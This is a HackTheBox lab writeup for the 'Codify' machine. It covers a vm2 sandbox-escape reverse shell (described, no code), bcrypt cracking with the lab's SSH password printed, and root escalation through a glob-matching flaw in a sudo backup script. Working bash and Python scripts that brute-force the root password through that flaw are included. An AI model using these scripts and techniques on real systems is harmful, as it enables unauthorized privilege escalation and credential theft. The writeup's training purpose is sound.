Codify | HackTheBox Writeup
About Machine
HackTheBox Codify covers sandbox escape, password cracking, script analysis, and privilege escalation. Initial access came from a sandbox escape in a Node.js code runner. Enumeration turned up a bcrypt password hash; cracking it allowed moving from the "svc" service account to "joshua." A MySQL backup script runnable through sudo, whose password check relied on a glob comparison, was then abused to recover the root password. Codify rewards a broad skill set spanning web apps, databases, shell scripts, authentication, and system administration: thorough enumeration, lateral thinking, and chaining several techniques are what get you to root.
Nmap Scan
nmap -sC -sV -p- codify.htb
Pre Enumeration
Both web servers hosted the same web application: an online editor for testing Node.js code. When I tried running reverse-shell JavaScript through it, the attempt failed because the application blocks certain modules.
I also discovered that the server executes submitted code inside a sandbox built on the vm2 library.
Searching for recent vm2 vulnerabilities turned up CVE-2023-30547, a sandbox escape that lets submitted code run arbitrary commands in the host context.
I adapted the public proof of concept to launch a reverse shell and submitted it through the editor.
Success: the payload called back and I had a reverse shell on the box.
In the directory /var/www/contact, I found an SQLite database file containing a username and a bcrypt password hash.
Successfully cracked the password. Now that we have the username and password, let’s SSH into the box.
ssh joshua@codify.htb
Password: spongebob1
Got a user flag.
Privilege Escalation
sudo -l
Checking sudo permissions with sudo -l revealed that joshua could run /opt/scripts/mysql-backup.sh as root.
Analyzing /opt/scripts/mysql-backup.sh, I found that the vulnerability lies in how the password confirmation is handled.
This segment of the script compares the user-supplied password (USER_PASS) against the real database password (DB_PASS). The problem is the use of == inside [[ ]] in Bash with an unquoted right-hand operand: in that position Bash performs pattern matching rather than a literal string comparison. The user input (USER_PASS) is therefore treated as a glob pattern, and if it contains metacharacters such as * or ?, it can match strings it was never meant to match. Quoting the right-hand side ("$USER_PASS") would have made the comparison literal.
For instance, if the actual password (DB_PASS) is password123 and the user enters * as their password (USER_PASS), the comparison succeeds because * matches any string, so the script reports the password as confirmed.
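To make that comparison concrete, here is an added example, my own code and not the mysql-backup.sh from the box: a vulnerable check shaped like the one described above sits next to a hardened one, and a small extractor recovers a constructed secret by using the vulnerable check as an oracle, which is the same prefix-plus-wildcard technique used against the box later in this writeup. DB_PASS, the function names and the character set are assumptions for the demo; run it with bash, since [[ ]] is not POSIX sh.

```bash
#!/usr/bin/env bash
# Added example, not the script from the box. DB_PASS is a constructed secret;
# the real mysql-backup.sh reads its own password from its configuration.
DB_PASS='password123'

# Vulnerable check, shaped like the comparison the writeup describes: inside
# [[ ]], an unquoted right-hand side of == is a glob pattern, so user input
# containing * or ? is matched as a pattern instead of compared literally.
check_vulnerable() {
    local USER_PASS="$1"
    if [[ $DB_PASS == $USER_PASS ]]; then
        echo "Password confirmed!"
    else
        echo "Password confirmation failed!"
        return 1
    fi
}

# Hardened check: quoting the right-hand side disables pattern matching, so
# only the exact string is accepted. (The POSIX form [ "$a" = "$b" ] never
# globs either.)
check_fixed() {
    local USER_PASS="$1"
    if [[ "$DB_PASS" == "$USER_PASS" ]]; then
        echo "Password confirmed!"
    else
        echo "Password confirmation failed!"
        return 1
    fi
}

# Recover the secret one character at a time, using the vulnerable check as an
# oracle: the prefix found so far, plus one candidate character, plus "*".
# Stops when no candidate extends the prefix. The charset deliberately contains
# no glob metacharacters, so every guess is unambiguous.
extract_password() {
    local charset='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
    local found='' c extended i
    while :; do
        extended=0
        for (( i = 0; i < ${#charset}; i++ )); do
            c=${charset:i:1}
            if check_vulnerable "${found}${c}*" >/dev/null; then
                found+="$c"
                extended=1
                break
            fi
        done
        [ "$extended" -eq 1 ] || break
    done
    printf '%s\n' "$found"
}

# Demo: the bypass, the fix, and the recovered secret.
check_vulnerable '*'
check_fixed '*' || true
echo "Recovered: $(extract_password)"
```

Each oracle query here is a local function call; against the box the same query is one invocation of sudo /opt/scripts/mysql-backup.sh with the guess on stdin, so the extraction costs at most charset-size calls per character of the password.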
This implies that we can systematically attempt to brute-force each character in the DB_PASS.
    #!/usr/bin/env python3
    # Recover DB_PASS one character at a time through the glob comparison in
    # /opt/scripts/mysql-backup.sh: the script runs as root via sudo, reads the
    # password from stdin and prints "Password confirmed!" on a match.
    import string
    import subprocess

    # Candidate characters; no glob metacharacters, so each guess is unambiguous
    # and safe to splice into the shell command below.
    all_characters = list(string.ascii_letters + string.digits)
    final_password = ""
    password_found = False

    while not password_found:
        for character in all_characters:
            # Known prefix, one candidate character, then "*" to match the rest.
            command = f"echo '{final_password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
            output = subprocess.run(command, shell=True, stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE, text=True).stdout
            if "Password confirmed!" in output:
                final_password += character
                break
        else:
            # No candidate extended the prefix: the whole password is recovered.
            password_found = True

    print(final_password)
I ran the Python script above to carry out the brute force and extract the password.
Password: kljh12k3jhaskjh12kjh3
We can use this password for root.
su root
Got root flag !!!!